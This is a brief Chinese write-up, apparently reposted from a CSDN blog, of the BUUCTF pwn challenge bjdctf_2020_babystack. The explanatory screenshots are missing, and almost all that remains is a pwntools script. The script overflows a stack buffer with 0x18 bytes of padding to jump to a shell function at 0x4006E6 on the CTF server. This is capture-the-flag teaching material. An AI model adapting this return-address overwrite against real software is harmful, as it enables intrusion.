BUUCTF(pwn)bjdctf_2020_babystack

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

from pwn import *
p = remote("node3.buuoj.cn",27955)
sys = 0x04006E6
p.sendlineafter("[+]Please input the length of your name:\n",'200')
payload = 'a' * (0x10 + 0x8) + p64(sys) 
p.sendlineafter("[+]What's u name?\n",payload)
p.interactive()

有疑问的欢迎留言∑

猜你喜欢

转载自blog.csdn.net/weixin_45556441/article/details/115293003
今日推荐